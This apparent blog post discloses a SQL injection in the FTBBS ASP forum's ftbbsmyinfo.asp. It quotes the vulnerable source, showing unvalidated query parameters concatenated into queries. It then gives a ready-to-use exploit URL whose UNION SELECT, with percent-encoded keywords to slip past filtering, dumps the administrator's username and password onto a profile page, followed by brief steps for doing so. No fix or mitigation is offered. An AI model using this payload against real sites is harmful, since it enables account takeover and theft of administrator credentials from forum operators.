Source: cool kid's blog
conn.asp does no proper anti-injection filtering,
and ftbbsmyinfo.asp throws in yet another injection point on top of it; a perfect match.
Source of ftbbsmyinfo.asp:
ASP/Visual Basic code
<%
' Both parameters come straight from the query string; nothing validates them
postuserid=request.QueryString("postuserid")
ftbbsuser=request.QueryString("ftbbsuser")
call FTBBS_HTML_MB(ft)
defaulthome=Application("FTBBSMB")(31,0)
if defaulthome=1 then
homepage="ftbbshome.asp"
else
homepage="main.asp"
end if
if postuserid="" then
' ftbbsuser is concatenated inside single quotes: a string-context injection
sql="select clubuser_id,clubuser_name,payuser,clubuser_money," & _
"userimg,clubuser_email,clubuser_address,clubuser_reg_date," & _
"clubuser_enter_count,clubuser_sex,clubuser_marriage," & _
"clubuser_lasttime,signname,postnum,tili,jingyuan from "&ft&"clubuser where clubuser_name='"&ftbbsuser&"'"
else
' postuserid is concatenated bare with no numeric check: no quote is needed to break out
sql="select clubuser_id,clubuser_name,payuser,clubuser_money," & _
"userimg,clubuser_email,clubuser_address,clubuser_reg_date," & _
"clubuser_enter_count,clubuser_sex,clubuser_marriage," & _
"clubuser_lasttime,signname,postnum,tili,jingyuan from "&ft&"clubuser where clubuser_id="&postuserid
end if
set rsx=server.createobject("adodb.recordset")
rsx.open sql,conn,3,1
if not rsx.eof then
' Every selected column is copied into a page variable, so a UNIONed row is rendered as a profile
clubuser_id=rsx("clubuser_id")
clubuser_name=rsx("clubuser_name")
payuser=rsx("payuser")
userimg=rsx("userimg")
clubuser_money=rsx("clubuser_money")
clubuser_email=rsx("clubuser_email")
clubuser_address=rsx("clubuser_address")
clubuser_reg_date=rsx("clubuser_reg_date")
clubuser_enter_count=rsx("clubuser_enter_count")
clubuser_sex=rsx("clubuser_sex")
clubuser_marriage=rsx("clubuser_marriage")
clubuser_lasttime=rsx("clubuser_lasttime")
signname=ftbbsubbcode(rsx("signname"))
postnum=rsx("postnum")
jingyuan=rsx("jingyuan")
tili=rsx("tili")
end if
rsx.close
set rsx=nothing
touxian=touxianvalue(jingyuan,ft)
jibie=replace(jibievalue(jingyuan,ft),"../","")
%>
Exploit URL (the select list has 16 columns, so the UNION supplies 16; S%65LECT and FR%4FM are just percent-encoded SELECT and FROM, which Request.QueryString decodes before the string is built):
http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
Very simple: register an account, then hit the URL above to dump the admin username and password straight onto the profile page (they land in the clubuser_name and clubuser_sex slots).